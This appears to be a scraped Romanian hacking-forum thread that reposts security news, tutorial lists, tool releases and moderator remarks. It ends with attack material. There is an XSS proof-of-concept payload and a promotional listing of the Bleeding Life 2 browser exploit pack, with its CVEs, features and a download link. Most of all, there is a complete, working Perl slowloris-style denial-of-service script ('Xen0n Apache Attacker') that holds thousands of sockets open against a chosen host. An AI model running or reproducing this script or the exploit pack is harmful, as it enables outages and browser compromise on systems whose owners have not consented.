Nytro

ASLR Added to Android 4.0 by Dennis Fisher October 24, 2011, 8:36AM The newest version of the Android mobile operating system includes a major security upgrade, the presence of address space layout randomization (ASLR), which gives users some better protection against memory-corruption exploits. The inclusion of ASLR in Android 4.0, also known as "Ice Cream Sandwich", brings the security model of the operating system up a notch in relation to previous versions. Security researchers have criticized Android for its security shortcomings and have said that the security model offered by Apple's iOS is more beneficial for users. The iPhone operating system has included ASLR and data execution protection (DEP) for some time now, and iOS also includes a sandbox to help prevent attackers from moving among various applications once they've compromised a device. ASLR is designed to help prevent certain kinds of attacks by making it more difficult for attackers to know which components will be in which memory locations. The technology randomly arranges the positions of various components of a process, which makes it harder to attacks such as buffer overflows and other memory-corruption techniques to succeed. Both ASLR and DEP have been key technologies in desktop operating systems such as Windows Vista and Windows 7 to help prevent common attack techniques. In addition to the inclusion of ASLR, Android 4.0 also has improved management of user credentials. "Android 4.0 makes it easier for applications to manage authentication and secure sessions. A new keychain API and underlying encrypted storage let applications store and retrieve private keys and their corresponding certificate chains. Any application can use the keychain API to install and store user certificates and CAs securely," the Android 4.0 developer notes say. The new mobile OS also includes an enhanced API for VPNs. "Developers can now build or extend their own VPN solutions on the platform using a new VPN API and underlying secure credential storage. With user permission, applications can configure addresses and routing rules, process outgoing and incoming packets, and establish secure tunnels to a remote server. Enterprises can also take advantage of a standard VPN client built into the platform that provides access to L2TP and IPSec protocols," the notes say. Sursa: ASLR Added to Android 4.0 | threatpost

Da, sunt comunist cand vine vorba de astfel de rahaturi. Nu am comentat nimic la topicuri tehnice, nu am inchis niciunul, nu am dat niciun ban acolo. Dau ban aici, celor ca tine, care nu au ce cauta aici, care spera sa vanda bilete la pariuri si nu sa lucreze in IT.

M-am saturat de discutii despre pariuri, Serban Huidu, recesamant sau alte porcarii. RST nu e locul potrivit pentru asa ceva, nici chiar la offtopic. Desigur, daca e sa ma uit la posturile tale ai doar un post "interesant" la Tutoriale romana: te caci pe el tutorial. inca sunt socat ca ai pus virus scan la un fisier html ))) unul la Prezentari si restul sunt aici, la Offtopic. Practic, conform legilor lui Nytro, esti in plus aici (deocamdata). PS: Se vor limita acest gen de discutii. Daca nu va convine, exista OTV.

Assembly Language Megaprimer for Linux Description In this video series, we will learn the basics of Assembly Language programming on Linux. This will help us in doing reverse engineering and writing exploits in later videos. I will be start from the absolute scratch, so no pre-requisites required. - Assembly Primer For Hackers (Part 1) System Organization - Assembly Primer For Hackers (Part 2) Virtual Memory Organization - Assembly Primer For Hackers (Part 3) Gdb Usage Primer - Assembly Primer For Hackers (Part 4) Hello World - Assembly Primer For Hackers (Part 5) Data Types - Assembly Primer For Hackers (Part 6) Moving Data - Assembly Primer For Hackers (Part 7) Working With Strings - Assembly Primer For Hackers (Part 8) Unconditional Branching - Assembly Primer For Hackers (Part 9) Conditional Branching - Assembly Primer For Hackers (Part 10) Functions - Assembly Primer For Hackers (Part 11) Functions Stack Videos: http://www.securitytube.net/groups?operation=view&groupId=5

Windows Assembly Language Megaprimer Description In this video series, we will learn how to write assembly code for Windows. We will be using the knowledge we gained in the Assembly Language Megaprimer for Linux. - Windows Assembly Language Primer Part 1 (Processor Modes) - Windows Assembly Language Primer For Hackers Part 2 (Protected Mode Assembly) - Windows Assembly Language Primer For Hackers Part 3 (Win32 Asm Using Masm32) - Windows Assembly Language Primer For Hackers Part 4 (Masm Data Types) - Windows Assembly Language Primer For Hackers Part 5 (Procedures) - Windows Assembly Language Primer For Hackers Part 6 (Macros) - Windows Assembly Language Primer For Hackers Part 7 (Program Control Using Jmp) - Windows Assembly Language Primer For Hackers Part 8 (Decision Directives) - Windows Assembly Language Primer For Hackers Part 9 (Loops) Videos: http://www.securitytube.net/groups?operation=view&groupId=6

Exploit Research Megaprimer Description In this video series, we will learn how to program exploits for various vulnerabilities published online. We will also look at how to use various tools and techniques to find Zero Day vulnerabilities in both open and closed source software. - Exploit Research Megaprimer Part 1 Topic Introduction By Vivek - Exploit Research Megaprimer Part 2 Memcpy Buffer Overflow - Exploit Research Megaprimer Part 3 Strcpy Buffer Overflow - Exploit Research Megaprimer Part 4 Minishare Buffer Overflow - Exploit Research Megaprimer Part 5 Freesshd Buffer Overflow - Exploit Research Megaprimer Part 6 Seh Basics - Exploit Research Megaprimer Part 7 Overwrite Seh - Exploit Research Megaprimer Part 8 Exploiting Seh - Exploit Research Megaprimer Part 9 Guest Lecture By Andrew King - Binary Diffing Microsoft Patches Videos: http://www.securitytube.net/groups?operation=view&groupId=7

Inchidem topicul, locul acesta se vrea sa fie pentru cei pasionati de securitatea IT, discutati altundeva despre pariuri. Edit: daca ai facut soft pentru asa ceva, e alta treaba.

Secure Your Wordpress | Tool Explained Wpscan Description: Wordpress is one of the most popular CMS among its entire open source competitor. WordPress has very simple and open framework. It is the most desirable choice of any hacker to start learning hacking with it. Today we will look at tool called wpscan. This tool is vulnerability scanner for any WordPress installation. It will let you know following things 1. Version of the WordPress 2. Known list of information disclosure files (ex. Readme.html) 3. WordPress usernames 4. WordPress Plugin names 5. Bruteforce for password (Password list needs to be generated) Video: http://www.securitytube.net/video/2367

Vezi cum arata link-ul, are nevoie de mici modificari... Ex: Download Security_and_Hacking_Anti_Hacker_Tool_Kit_Second_Edition.chm for free on Filesonic.com

xSQLScanner 1.2 and Mono Version From: Rodrigo Matuck <rodrigomatuck () globo com> Date: Sun, 23 Oct 2011 21:47:25 -0200 Hi everyone I published at my blog a new tool called xSQLScanner. This program allow the user audit MS-SQL and My-SQL servers. Some features: 1 - 6 Vulnerability Audit options; 1.2 - Test for weak password fast; 1.3 - Test for wear/user passwords; 1.4 - Wordlist option; 1.5 5 - Userlist option; 2 - Portscanner 7 - Range IP Address audit and more. Now the good news, i made 2 versions. Windows & Linux. The linux version use the Mono Project, so i compiled mono version to run under Linux (BackTrack 5 - GNOME). Here the instructions to install under linux: 1 - get xsqlscan-mono.tgz - 4shared.com - online file sharing and storage - download 2 - tar -xzvf xsqlscan.tar.gz 3 - cd xsqlscan 4 - ./xsqlscanw 5 - The program will verify if you have Mono Core files. If already have, the application will launcher. 5.1 - Answer 'yes' to download the libs and mono core files 6 - Restart the application typing: ./xsqlscanw 7 - Enjoy. The link for Windows version: xsqlscanner-1.2.zip - 4shared.com - online file sharing and storage - download Remember: any bugs, suggestions please contact me. Regards Sursa: Penetration Testing: xSQLScanner 1.2 and Mono Version

Owned and exposed - Nr. 3 |\___/| -=[ISSUE - NO 3]=- =) ^Y^ (= -=[OF]=- \ ^ / )=*=( ______________________________ __ ____________ _ / \ |.-----.--.--.--.-----.-----.--| | ___ ___ _| || | | || _ | | | | | -__| _ | | . | | . || /| | | |\ ||_____|________|__|__|_____|_____| |__,|_|_|___|| \| | |_|/\ | | | ______ |__//_// ___/ __ | | | .-----.--.--.-----.| |.-----.--\_).--| || | | | | -__|_ _| _ || || ||__ --| -__| _ || | | | |_____|__.__| __|| || ||_____|_____|_____|| |_/ \__________________________|__|___| || |___________________| |______| Featuring... .---. /\ Brought to you by .---. / . \ / \ your Happy Ninjas / . \ |\_/| | | | |\_/| | | | /| | b | | | /| .-----------------------' | | a | .---------------------------' | / .-. | | c | / .-. | | / \ Intro | | k | | / \ The Happy Ninja Faker | | |\_. | St0re.cc | | | | |\_. | Swissfaking.net | |\| | /| El-Basar.biz | | | |\| | /| Vpn24.org | | `---' | | | o | | `---' | | | |------------------' | n | | |----------------------' \ | .---. | c | \ | .---. \ / / . \ | e | \ / / . \ `---' |\_/| | | | `---' |\_/| | | | /| | | | | /| .-----------------------' | | a | .---------------------------' | / .-. | | g | / .-. | | / \ Undercover.su | | a | | / \ Secure-Host.in | | |\_. | k!LLu's Botnet | | i | | |\_. | Unique-Crew.net | |\| | /| | | n | |\| | /| | | `---' | | | | | `---' | | | |------------------' | | | |----------------------' \ | .---. | h | \ | .---. \ / / . \ | e | \ / / . \ `---' |\_/| | | r | `---' |\_/| | | | /| | e | | | /| .-----------------------' | | | .---------------------------' | / .-. | | | / .-. | | / \ Zion-Network.net | | t | | / \ Some leftovers | | |\_. | Hackbase.cc | | o | | |\_. | Outro | |\| | /| | | | |\| | /| | | `---' | | | | | `---' | | | |------------------' | r | | |----------------------' \ | | m | \ | \ / | | \ / `---' | /\ | `---' :\______|/ \|______/: \__0day______0day__/ | /\ | || || || || || || || || | \/ | \____/ (____) First of all, here is the verification of the sha1 hash we published when hba-crew got owned: 49bd4433fff1b04530dcaff1f52fa971ff895871 = sha1(HAPPY_NINJAS_ARE_STAYING_HAPPY_exp03) ,;~;, /\_ ( / (() //) | \\ ,,;;'\ __ _( )m=((((((((((((((========={ Intro }=========------- /' ' '()/~' '.(, | ,;( )|| | ~ Tonight's the night. And it's going to happen, ,;' \ /-(.;, ) again and again. It has to happen. ) / ) / // || We all want to welcome you to a brand new issue )_\ )_\ of Owned and exp0sed! Before we get to the fun part, we'd just like to clarify some things since there has been a lot going on on the internet since our last issue. Movements, as they put it, like Anonymous or the short-lived phenomenon of Lulzsec have gotten an increasingly important topic to media and the public. We want to line out our motivation in contrast to theirs. Anonymous has tried to gain as much media attention as possible by inflicting the most damage possible on big companies and service providers. Similarily, Lulzsec have attacked various websites and published an enormous amount of information. However, while it's their goal to put up pressure on governments and big organizations, it's ours to protect the public from the abysses of the internet. Fraud is our main concern and we intent to contain it as much as possible. While Anon and Lulzsec toss out their stuff within weeks, we take our time to gain access, collect data and aggregate it nicely for you, our readers. This is why there is a substantial time span between our releases. We of course also monitor the German and international fraud scene as it recovers from our attacks; it's hard to stop something that is driven by selfishness, greed and money. We also find it worrying that Anonymous and especially Lulzsec act in what they call "Operation Antisec". The original Antisec Movement was brought to life by actual hackers and targeted full disclosure and the corporate security industry. Publishing gigantic amounts of (corporate) data on the internet does exactly the opposite: It provides the security industry with the attention they need and hence new customers. But let's now look at why we are here today. "Money is the root of all evil" as the proverb has it; and it's why fraud communities do come back after we have owned and exposed them; but as long as they carry on, we do, too. Fraudsters ought to know that they're not safe because we are going to hunt down every single site that is left. We experience the fraud scene scattering wider and wider after every issue we have published; new boards, and with them new admins, emerge out of nowhere. That just shows well again how stubborn fraudsters are as most of them still refuse to accept that they lost their right to exist on the internet. It's particularly frustrating that they don't seem to draw lessons from getting owned again and again. That being said we can just strongly advise you to spend your time on something worthwhile. It's not too late ... Download: http://blog.yakuza112.org/wp-content/uploads/2011/10/exp03.txt

Agnitio Security Code Review Tool v2.1 released OCTOBER 24, 2011 | WRITTEN BY SECURITY NINJA Hi everyone, I wanted to write a blog post today to let you all know that I've released Agnitio v2.1 today. I did plan to release this version a few weeks ago but a combination of life and bugs/last minute feature changes delayed the release, better late than never though! I’ve made a lot of changes for this release so I wanted to make extra sure that everything worked before I released it. Interestingly Agnitio passed all of its QA tests in the first test run but the Data Migration Tool was a different story! The DMT is used to migrate users existing data into the new Agnitio checklist database. It’s probably not the best way to perform an upgrade and it certainly needs some work but for now it works! Agnitio currently puts the new checklist database into the program files directory alongside the other Agnitio files which can cause a bit of problem because of the default file permissions on the Program Files directory. The program files directory in Windows 7 has better (the definition of better requires me look at it as a security professional and not as someone writing code!) default permissions/restrictions than previous versions of Windows I believe which causes a problem when using Agnitio or the DMT as a standard user. The user obviously needs to be able to read data from the checklist database and of course write reviews or changes to the database. I tried a few different approaches to rectifying this and I’ve settled on a solution which probably isn’t ideal but it does mean standard users can use Agnitio on Windows 7. The DMT will need to be run as an administrator to migrate the data but after that administrator privileges aren’t needed anymore. You will need to make a few permission changes regardless of the operating system you are using so please make sure you read the Agnitio v2.1 User Guide (included as part of the installation) before you attempt to use the new version or migrate your data. I’m currently working on a better solution to this with a new contributor so I’d expect to have a nicer solution to this problem when the next version of Agnitio is released! So what’s new in v2.1? I have listed all of the changes in this release below: Windows x64 support (thanks to Steven van der Baan). Decompile Android .apk files so you can analyse the source code and AndroidManifest.xml file. This uses tools like JAD so you will need to have Java installed on your machine to decompile the Android .apk files. C# and Java rules from the OWASP Code Crawler tool imported into the Agnitio database and linked to the relevant checklist questions. New checklist items for mobile application security code reviews. These checklist items were created to address items in the OWASP top 10 mobile risks project that weren’t covered by existing checklist items. Application profiles can now be configured as either “Web” or “Mobile”. This will determine which checklist items from the database are used to create the checklist for the application being reviewed. Create new checklist items. You will be able configure the relevant principle of secure development for the new checklist item as well as deciding whether this is a question for “Web”, “Mobile” or “Both” types of applications. Modify existing checklist items. This was supposed to be included in v2.0 but a last minute change I made at 7am in a Las Vegas hotel room broke this functionality. You can now modify the text, the principle and type columns for questions in the checklist database. I made a lot of small changes in addition to the ones above; I’ve listed some of the more obvious ones below: Only one answer allowed per checklist item (thanks to Steven van der Baan). Fixed a bug on the security code review tab where checklist items with no answers are highlighted in red and never “un-highlighted” (thanks to Steven van der Baan). Added a language checkbox for Objective-C on the profile creation and view profile tabs. Checklists are now sorted by principle and not by the question number. I did have two issues which I couldn’t get fixed but I decided to release v2.1 now because it has already taken longer than I’d planned! The two issues will only affect x64 users and I will make sure they are fixed as part of v2.2: Android .apk decompile functionality will fail to decompile .apk files on Windows x64. Data Migration Tool (for upgrades from v2.0) is not supported on x64 at the moment. You can use the Data Migration Tool on x86 versions of Windows to migrate your v2.0 data. I think I’ve included all of the new features and changes in this blog post so all that’s left for me to do now is give you link to download v2.1: Agnitio v2.1 I have started to plan what will be included in v2.2 but I’ve not started working on it yet. I have a few cool ideas in mind for v2.2 which I think you will all like. I’ve released 5 versions of Agnitio over the past 11 months which has eaten up a lot of my spare time and I don’t really enjoy working on one thing for a long time. I will be taking a couple of weeks away from the project before I start work on v2.2 to rest my poor overworked brain I don’t expect to release v2.2 until sometime after Christmas partly because of the break I’m taking from the project but mainly because of the amount of work that I will need to do to implement the cool changes I want to make! As always I’d love to hear what you think of the latest version of Agnitio so get in touch via Twitter, email or leave a comment on this blog post. SN Download: https://sourceforge.net/projects/agnitiotool/files/v2.1/ Sursa: https://www.securityninja.co.uk/application-security/agnitio-security-code-review-tool-v2-1-released/

Aidsql: Sql Injection Penetration Testing Tool Description: This is a video showing you how to effecitvely audit your website with aidsql. Download aidSQL: aidSQL: A Tools to Find Vulnerable Spots in Website - Insecure Stuff Video: http://www.securitytube.net/video/2370

https://www.google.com/search?hl=en&q=yo%2C+what%27s+my+ip%3F%21

Python Programming Tutorials Here is all of my Python Programming high quality tutorials! 3:19 Python Programming Tutorial - 1 - Installing Python by thenewboston 293,520 views 2 5:40 Python Programming Tutorial - 2 - Numbers and Math by thenewboston 192,181 views 3 6:25 Python Programming Tutorial - 3 - Variables by thenewboston 152,139 views 4 7:08 Python Programming Tutorial - 4 - Modules and Functions by thenewboston 154,537 views 5 8:25 Python Programming Tutorial - 5 - How to Save Your P... by thenewboston 122,680 views 6 6:23 Python Programming Tutorial - 6 - Strings by thenewboston 104,006 views 7 5:28 Python Programming Tutorial - 7 - More on Strings by thenewboston 86,868 views 8 2:56 Python Programming Tutorial - 8 - Raw Input by thenewboston 89,108 views 9 5:04 Python Programming Tutorial - 9 - Sequences and Lists by thenewboston 82,545 views 10 7:43 Python Programming Tutorial - 10 - Slicing by thenewboston 82,488 views 11 6:43 Python Programming Tutorial - 11 - Editing Sequences by thenewboston 72,190 views 12 6:28 Python Programming Tutorial - 12 - More List Functions by thenewboston 68,699 views 13 4:58 Python Programming Tutorial - 13 - Slicing Lists by thenewboston 55,699 views 14 6:02 Python Programming Tutorial - 14 - Intro to Methods by thenewboston 60,803 views 15 4:15 Python Programming Tutorial - 15 - More Methods by thenewboston 54,476 views 16 3:57 Python Programming Tutorial - 16 - Sort and Tuples by thenewboston 49,275 views 17 6:18 Python Programming Tutorial - 17 - Strings n Stuff by thenewboston 47,952 views 18 5:31 Python Programming Tutorial - 18 - Cool String Methods by thenewboston 50,276 views 19 6:13 Python Programming Tutorial - 19 - Dictionary by thenewboston 54,215 views 20 5:50 Python Programming Tutorial - 20 - If Statement by thenewboston 57,107 views 21 5:05 Python Programming Tutorial - 21 - else and elif by thenewboston 45,434 views 22 4:17 Python Programming Tutorial - 22 - Nesting Statements by thenewboston 41,405 views 23 4:33 Python Programming Tutorial - 23 - Comparison Operators by thenewboston 38,245 views 24 6:15 Python Programming Tutorial - 24 - And and Or by thenewboston 36,982 views 25 5:37 Python Programming Tutorial - 25 - For and While Loops by thenewboston 51,979 views 26 5:45 Python Programming Tutorial - 26 - Infinite Loops an... by thenewboston 42,562 views 27 5:20 Python Programming Tutorial - 27 - Building Functions by thenewboston 47,205 views 28 4:04 Python Programming Tutorial - 28 - Default Parameters by thenewboston 35,939 views 29 5:08 Python Programming Tutorial - 29 - Multiple Parameters by thenewboston 34,582 views 30 6:10 Python Programming Tutorial - 30 - Parameter Types by thenewboston 34,451 views 31 4:22 Python Programming Tutorial - 31 - Tuples as Parameters by thenewboston 29,344 views 32 7:10 Python Programming Tutorial - 32 - Object Oriented P... by thenewboston 63,602 views 33 7:48 Python Programming Tutorial - 33 - Classes and Self by thenewboston 54,274 views 34 4:12 Python Programming Tutorial - 34 - Subclasses Superc... by thenewboston 36,963 views 35 3:16 Python Programming Tutorial - 35 - Overwrite Variabl... by thenewboston 29,873 views 36 3:46 Python Programming Tutorial - 36 - Multiple Parent C... by thenewboston 28,343 views 37 4:17 Python Programming Tutorial - 37 - Constructors by thenewboston 30,597 views 38 6:51 Python Programming Tutorial - 38 - Import Modules by thenewboston 36,160 views 39 4:21 Python Programming Tutorial - 39 - reload Modules by thenewboston 25,267 views 40 5:21 Python Programming Tutorial - 40 - Getting Module Info by thenewboston 28,038 views 41 6:28 Python Programming Tutorial - 41 - Working with Files by thenewboston 38,421 views 42 5:23 Python Programming Tutorial - 42 - Reading and Writing by thenewboston 35,579 views 43 6:11 Python Programming Tutorial - 43 - Writing Lines by thenewboston 50,767 views Youtube: http://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA

All About Python and Unicode March 4, 2007 - 3:39pm - frank Contents A Starting Point Unicode Text in Python Converting Unicode symbols to Python literals Why doesn't "print" work? Codecs From Unicode to binary From binary to Unicode String Operations A wrinkle in {{{\U}}} Bugs in Python 2.0 & 2.1 Python as a "universal recoder" Now the Fun Begins ... Unicode and the Real World Unicode Filenames Microsoft Windows Unix/POSIX/Linux Mac OS/X Unicode and HTML Unicode and XML Unicode and network shares (Samba) Summary Articol: http://boodebr.org/main/python/all-about-python-and-unicode

iPad 2 iOS 5 Lock Screen Bypass Vulnerability + Video Marc Gurman at 9to5Mac has discovered a vulnerability on the iPad that allows for a limited bypass of the device's lockscreen. Anyone with an iPad Smart Cover can gain access to the previously-open app (or the home screen if no app was open). By holding the power button to bring up the ‘Power Off’ screen, closing the smart cover, re-opening it, and clicking cancel, the attacker will be dropped into the screen that was open before the iPad was locked. If the attacker gets dropped into the home screen, then they'll be able to see the installed apps, but won't be able to open anything. If Safari or Mail (or any other app) was the open when the device was locked, then the attacker would have access to that app. From a locked iPad 2: 1) Lock a password protected iPad 2 2) Hold down power button until iPad 2 reaches turn off slider 3) Close Smart Cover 4) Open Smart Cover 5) Click cancel on the bottom of the screen Video: http://www.youtube.com/watch?v=NLgQ22naQhE This isn’t the first security issue Apple has experienced since rolling out iOS 5. On the brand new iPhone 4S it has been discovered you can use Siri when a device is locked. Even if a passcode is required, Siri doesn’t care and allows you to carry out functions such as sending email and text messages. Protection Against the iPad 2 Lock Screen Bypass: For the time being, iPad 2 users are encouraged to disable the "Smart Cover unlocking" feature found in Settings > General. Sursa: http://thehackernews.com/2011/10/ipad-2-ios-5-lock-screen-bypass.html

Anonymous Hackers Take Down 40 Child Porn Websites Anonymous has taken down more than 40 darknet-based child porn websites over the last week. Details of some of the hacks have been released via pastebin #OpDarknet, including personal details 1500 users of a site named 'Lolita City,' and DDoS tools that target Hidden Wiki and Freedom Hosting - alleged to be two of the biggest darknet sites hosting child porn. News of the Anonymous campaign to actively target anyone hosting child porn sites comes from statements associated with Anonymous on Pastebin and two Anonymous YouTube video channels. AnonNews has yet to issue a press release. The AnonMessage and BecomeAnonymous YouTube channels both posted videos with statements of intent to hunt, skin and kill pedobears everywhere, starting with Freedom Hosting. Sursa: http://thehackernews.com/2011/10/anonymous-hackers-take-down-40-child.html

OpenVAS - Advanced Open Source vulnerability scanner OpenVAS is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution.The powerful and comprehensive OpenVAS solution is available as Free Software and maintained on a daily basis. An overview of the vulnerability handling process is: - The reporter reports the vulnerability privately to OpenVAS. - The appropriate component's developers works privately with the reporter to resolve the vulnerability. - A new release of the OpenVAS component concerned is made that includes the fix. The OpenVAS Manager is the central service that consolidates plain vulnerability scanning into a full vulnerability management solution. The Manager controls the Scanner via OTP (OpenVAS Transfer Protocol) and itself offers the XML-based, stateless OpenVAS Management Protocol (OMP). All intelligence is implemented in the Manager so that it is possible to implement various lean clients that will behave consistently e.g. with regard to filtering or sorting scan results. The Manager also controls a SQL database (sqlite-based) where all configuration and scan result data is centrally stored. Download: http://www.openvas.org/download.html Sursa: OpenVAS - Advanced Open Source vulnerability scanner ~ THN : The Hacker News

XSS Vulnerability in Interactive YouTube API Demo Beta There is a Critical Cross site XSS Vulnerability in Interactive YouTube API Demo Beta, Discovered by various sources. One of the White Hat Hacker "Vansh Sharma" Inform us about this XSS Vulnerability with proof of concept. Proof Of Concept : Open YouTube Data API - Demo Beta Enter script <img src="<img src=search"/onerror=alert("xss")//"> in the keyword area. Press ADD Sursa: XSS Vulnerability in Interactive YouTube API Demo Beta ~ THN : The Hacker News

Bleeding Life 2 Exploit Pack Released Black Hat Academy releases Bleeding Life 2 exploit pack. This is an exploit pack that affects Windows-based web browsers via Adobe and Java. You can read all about it, and download it for yourself. Statistics are kept based on exploit, browser, and OS version. Exploits [+] Adobe - CVE-2008-2992 - CVE-2010-1297 - CVE-2010-2884 - CVE-2010-0188 [+] Java - CVE-2010-0842 - CVE-2010-3552 - Signed Applet Features Advanced Statistical Information Stylish Progress Bars Full User-Friendly Admin Panel Referer Stats Secure Panel - Login/Logout Ability To Set and Save Passwords On Panel Ability To Allow Guest Access - Guest Can Only View Stats Page, Clicking and Other Pages Disabled. Ability To Add and/or Remove Exploits Used Ability To Add Scan4You Credentials For Built-In Scanner Use Ability To Filter Browsers Ability To Filter Operating Systems Attempt To Detect and Filter HTTP Proxies Ability To Blacklist by IP/Range Ability To Import Blacklist On Panel Built In Scanner Ability To Upload Payload From Panel Payload Statistical Information - MD5, Size, SHA1 Ability To Generate iFrame On Panel / Encrypted Ability To Domain Check/Scan On Panel Download: http://www.blackhatacademy.org/releases/bleeding-life-2-download.tgz Sursa: http://thehackernews.com/2011/10/bleeding-life-2-exploit-pack-released.html

Apache Server Denial of Service exploit (DDOS) #!/usr/bin/perl -w # Exploit Title: Apache Server Denial of Service exploit (DDOS) # Date: 22/10/2011 # Author: Xen0n # Software Link: http://www.apache.org/dyn/closer.cgi # Version: 2.3.14 and older # Tested on: CentOs #feel free to contact us xenon.sec@gmail.com use strict; use IO::Socket::INET; use IO::Socket::SSL; use Getopt::Long; use Config; $SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors print <<EOTEXT; ooooooo ooooo .oooo. `8888 d8' d8P'`Y8b Y888..8P .ooooo. ooo. .oo. 888 888 ooo. .oo. `8888' d88' `88b `888P"Y88b 888 888 `888P"Y88b .8PY888. 888ooo888 888 888 888 888 888 888 d8' `888b 888 .o 888 888 `88b d88' 888 888 o888o o88888o `Y8bod8P' o888o o888o `Y8bd8P' o888o o888o Welcome to Xen0n Apache Attacker EOTEXT my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections ); my ( $cache, $xenon, $method, $ssl, $rand, $tcpto ); my $result = GetOptions('shost=s' => \$shost,'dns=s' => \$host,'xenon' => \$xenon,'num=i' => \$connections,'cache' => \$cache,'port=i' => \$port,'https' => \$ssl,'tcpto=i' => \$tcpto,'test' => \$test,'timeout=i' => \$timeout,'version' => \$version,); if ($version) { print "Version 1.0\n"; exit; } unless ($host) { print "Test:\n\n\tperl $0 -dns [www.example.com] -test\n"; print "Usage:\n\n\tperl $0 -dns [www.example.com] -port 80 -timeout 100 -num 1000 -tcpto 5 -xenon\n"; print "\n\temail: xenon.sec@ gmail.com\n"; print "\n"; exit; } unless ($port) { $port = 80; print "Defaulting to port 80.\n"; } unless ($tcpto) { $tcpto = 5; print "Defaulting to a 5 second tcp connection timeout.\n"; } unless ($test) { unless ($timeout) { $timeout = 100; print "Defaulting to a 100 second re-try timeout.\n"; } unless ($connections) { $connections = 1000; print "Defaulting to 1000 connections.\n"; } } my $usemultithreading = 0; if ( $Config{usethreads} ) { print "Multithreading enabled.\n"; $usemultithreading = 1; use threads; use threads::shared; } else { print "No multithreading capabilites found!\n"; print "Xen0n will be slower than normal as a result.\n"; } my $packetcount : shared = 0; my $failed : shared = 0; my $connectioncount : shared = 0; srand() if ($cache); if ($shost) { $sendhost = $shost; } else { $sendhost = $host; } if ($xenon) { $method = "POST"; } else { $method = "GET"; } if ($test) { my @times = ( "1", "30", "90", "240", "500" ); my $totaltime = 0; foreach (@times) { $totaltime = $totaltime + $_; } $totaltime = $totaltime / 60; print "Testing $host could take up to $totaltime minutes.\n"; my $delay = 0; my $working = 0; my $sock; if ($ssl) { if ( $sock = new IO::Socket::SSL( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working = 1; } } else { if ( $sock = new IO::Socket::INET( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working = 1; } } if ($working) { if ($cache) { $rand = "?" . int( rand(99999999999999) ); } else { $rand = ""; } my $primarypayload = "GET /$rand HTTP/1.1\r\n" . "Host: $sendhost\r\n" . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" . "Content-Length: 42\r\n"; if ( print $sock $primarypayload ) { print "Connection successful, now just wait...\n"; } else { print "That's odd - I connected but couldn't send the data to $host:$port.\n"; print "Is something wrong?\nDying.\n"; exit; } } else { print "Uhm... I can't connect to $host:$port.\n"; print "Is something wrong?\nDying.\n"; exit; } for ( my $i = 0 ; $i <= $#times ; $i++ ) { print "Trying a $times[$i] second delay: \n"; sleep( $times[$i] ); if ( print $sock "X-a: b\r\n" ) { print "\tWorked.\n"; $delay = $times[$i]; } else { if ( $SIG{__WARN__} ) { $delay = $times[ $i - 1 ]; last; } print "\tFailed after $times[$i] seconds.\n"; } } if ( print $sock "Connection: Close\r\n\r\n" ) { print "Okay that's enough time. Xen0n closed the socket.\n"; print "Use $delay seconds for -timeout.\n"; exit; } else { print "Remote server closed socket.\n"; print "Use $delay seconds for -timeout.\n"; exit; } if ( $delay < 166 ) { print <<EOSUCKS2BU; Since the timeout ended up being so small ($delay seconds) and it generally takes between 200-500 threads for most servers and assuming any latency at all... you might have trouble using Xen0n against this target. You can tweak the -tcpto flag down to 1 second but it still may not build the sockets in time. EOSUCKS2BU } } else { print "Attacking $host:$port every $timeout seconds with $connections sockets:\n"; if ($usemultithreading) { domultithreading($connections); } else { doconnections( $connections, $usemultithreading ); } } sub doconnections { my ( $num, $usemultithreading ) = @_; my ( @first, @sock, @working ); my $failedconnections = 0; $working[$_] = 0 foreach ( 1 .. $num ); #initializing $first[$_] = 0 foreach ( 1 .. $num ); #initializing while (1) { $failedconnections = 0; print "\t\tBuilding sockets.\n"; foreach my $z ( 1 .. $num ) { if ( $working[$z] == 0 ) { if ($ssl) { if ( $sock[$z] = new IO::Socket::SSL( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working[$z] = 1; } else { $working[$z] = 0; } } else { if ( $sock[$z] = new IO::Socket::INET( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working[$z] = 1; $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK } else { $working[$z] = 0; } } if ( $working[$z] == 1 ) { if ($cache) { $rand = "?" . int( rand(99999999999999) ); } else { $rand = ""; } my $primarypayload = "$method /$rand HTTP/1.1\r\n" . "Host: $sendhost\r\n" . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" . "Content-Length: 42\r\n"; my $handle = $sock[$z]; if ($handle) { print $handle "$primarypayload"; if ( $SIG{__WARN__} ) { $working[$z] = 0; close $handle; $failed++; $failedconnections++; } else { $packetcount++; $working[$z] = 1; } } else { $working[$z] = 0; $failed++; $failedconnections++; } } else { $working[$z] = 0; $failed++; $failedconnections++; } } } print "\t\tSending data.\n"; foreach my $z ( 1 .. $num ) { if ( $working[$z] == 1 ) { if ( $sock[$z] ) { my $handle = $sock[$z]; if ( print $handle "X-a: b\r\n" ) { $working[$z] = 1; $packetcount++; } else { $working[$z] = 0; #debugging info $failed++; $failedconnections++; } } else { $working[$z] = 0; #debugging info $failed++; $failedconnections++; } } } print "Current stats:\tXen0n has sent $packetcount packets to $host.\nThe attack will sleep for $timeout seconds...\n\n"; sleep($timeout); } } sub domultithreading { my ($num) = @_; my @thrs; my $i = 0; my $connectionsperthread = 50; while ( $i < $num ) { $thrs[$i] = threads->create( \&doconnections, $connectionsperthread, 1 ); $i += $connectionsperthread; } my @threadslist = threads->list(); while ( $#threadslist > 0 ) { $failed = 0; } } __END__ Sursa: Apache HTTP server Denial of service venerability

